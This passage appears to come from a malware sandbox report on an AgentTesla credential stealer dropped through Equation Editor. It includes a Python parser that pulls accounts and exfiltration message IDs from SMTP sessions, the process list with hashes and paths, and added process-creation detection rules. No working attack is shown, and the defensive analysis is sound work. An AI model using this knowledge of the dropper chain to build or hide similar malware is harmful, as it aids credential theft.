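            if d.startswith("334 "):
                s["prompt"] = b64_text(d[4:].strip())    # "Password:" for AUTH LOGIN
            if "STARTTLS" in d:
                s["starttls_offered"] = True
        else:
            verb, _, arg = d.partition(" ")
            verb = verb.upper()
            if verb == "AUTH" and arg.lower().startswith("login "):
                s["user"] = b64_text(arg.split()[1])     # base64 is encoding, not secrecy
            elif verb in ("MAIL", "RCPT"):
                key = "mail_from" if verb == "MAIL" else "rcpt_to"
                s[key].add(arg.split(":", 1)[1].strip("<>"))
            elif verb == "STARTTLS":
                s["starttls_used"] = True
    return dict(sessions)

def indicators(text):
    """Flatten the sessions into the IOCs an analyst pivots on."""
    ss = summarize(parse_rows(text)).items()
    return {"servers": sorted({s["remote"] for _, s in ss}),
            "accounts": sorted({s["user"] for _, s in ss if s["user"]}),
            "recipients": sorted(set().union(*(s["rcpt_to"] for _, s in ss))),
            "accepted_ids": [i for _, s in ss for i in s["accepted"]],
            "plaintext_auth": sorted(p for p, s in ss if s["user"] and not s["starttls_used"])}

if __name__ == "__main__":
    for key, value in indicators(SAMPLE).items():
        print(f"{key:16} {value}")
```

Feed it the whole network table of a report and `plaintext_auth` lists every session in which a credential was sent on a channel that never upgraded to TLS; `accepted_ids` counts how many exfiltration messages the server actually queued, which is the figure to hand to whoever owns the abused mailbox.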

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:03:21:40
                                            Start date:13/05/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f020000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:03:22:00
                                            Start date:13/05/2021
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:03:22:01
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Imagebase:0xef0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 49%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:03:22:05
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0xef0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:03:22:36
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 49%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:03:22:39
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:03:22:44
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:03:22:47
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low
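The System Behavior list above is the dropper chain: EQNEDT32.EXE is started at 03:22:00 and joewealth28743.exe appears under AppData\Roaming one second later; that binary is started a second time with its own path as the command line (shown as {path}), and it is this second instance that carries the Credential Stealer Yara matches; Nwefile.exe, with the identical MD5 0B4CC13DE8C54ADD5149B56649B3F680, then appears under a second AppData\Roaming path and repeats the same two-step launch. Below is an added detection example, not Joe Sandbox or Sigma code, that runs three rules over process-creation events. EVENTS is constructed from the paths, hashes and start times in the list; the PIDs and parent links are assumed for the example (the report does not show parents) and follow the order in which the processes appeared. One caveat is built in: EQNEDT32.EXE is an out-of-process COM server started by the DCOM service host, so Excel never shows up as its parent and a rule keyed on Excel misses the drop; the dropped child has to be caught with EQNEDT32.EXE as parent.

```python
"""Detection rules for the process chain in the System Behavior list above:
Equation Editor spawning a dropped binary, that binary relaunching its own
image, and an identical-hash copy appearing under a second path.  Added
example for this page, not Joe Sandbox or Sigma code.  EVENTS is constructed
from the report's paths, hashes and start times; PIDs and parent links are
assumed (the report lists no parents) and follow the order of appearance."""
from collections import defaultdict

USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")

EVENTS = [  # (pid, ppid, image, command_line, md5, start); PIDs and PPIDs constructed
    (1000, 900, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding",
     "5FB0A0F93382ECD19F5F499A5CAA59F0", "03:21:40"),
    # Equation Editor is a COM server: its parent is the DCOM service host
    # (assumed PID 901, not in this list), not EXCEL.EXE.
    (1001, 901, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
     "A87236E214F6D42A65F5DEDAC816AEC8", "03:22:00"),
    (1002, 1001, r"C:\Users\user\AppData\Roaming\joewealth28743.exe",
     r"C:\Users\user\AppData\Roaming\joewealth28743.exe",
     "0B4CC13DE8C54ADD5149B56649B3F680", "03:22:01"),
    # The report prints the relaunch command line as {path}, i.e. the image path.
    (1003, 1002, r"C:\Users\user\AppData\Roaming\joewealth28743.exe",
     r"C:\Users\user\AppData\Roaming\joewealth28743.exe",
     "0B4CC13DE8C54ADD5149B56649B3F680", "03:22:05"),
    (1004, 1003, r"C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe",
     r"'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'",
     "0B4CC13DE8C54ADD5149B56649B3F680", "03:22:36"),
    (1005, 1004, r"C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe",
     r"C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe",
     "0B4CC13DE8C54ADD5149B56649B3F680", "03:22:39"),
]

def in_user_writable(path):
    """True for locations a non-admin user can drop a binary into."""
    return any(marker in path.lower() for marker in USER_WRITABLE)

def detect(events):
    """Run three rules over process-creation events given in start order."""
    by_pid = {e[0]: e for e in events}
    paths_by_hash = defaultdict(set)
    findings = []
    for pid, ppid, image, _cmdline, md5, _start in events:
        parent = by_pid.get(ppid)
        parent_image = parent[2].lower() if parent else ""
        # Rule 1: anything Equation Editor starts.  Pivot on EQNEDT32.EXE as
        # the parent, never on Excel, because DCOM launches it, not Excel.
        if parent_image.endswith("\\eqnedt32.exe"):
            severity = "critical" if in_user_writable(image) else "high"
            findings.append(("eqnedt32_child", severity, pid, image))
        # Rule 2: a binary in a user-writable path starting a second copy of
        # its own image.  Restricting to such paths keeps browsers and
        # updaters, which also relaunch themselves, out of the alert stream.
        if parent_image == image.lower() and in_user_writable(image):
            findings.append(("self_relaunch", "high", pid, image))
        # Rule 3: the same MD5 surfacing under a new path (the dropper copied itself).
        known = paths_by_hash[md5]
        if known and image.lower() not in known:
            findings.append(("hash_copy", "medium", pid,
                             f"{image} has the MD5 of {sorted(known)[0]}"))
        known.add(image.lower())
    return findings

if __name__ == "__main__":
    for rule, severity, pid, detail in detect(EVENTS):
        print(f"{severity:8} {rule:15} pid={pid} {detail}")
```

Run as-is it reports four findings on the constructed chain: the drop from Equation Editor, both self-relaunches, and the Nwefile.exe copy sharing the dropper's hash. The first two events alone (Excel and EQNEDT32.EXE) produce nothing, which is the point of the caveat: with parentage as it really is, the document-to-EQNEDT32 step is invisible and the drop step is where the signal is.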
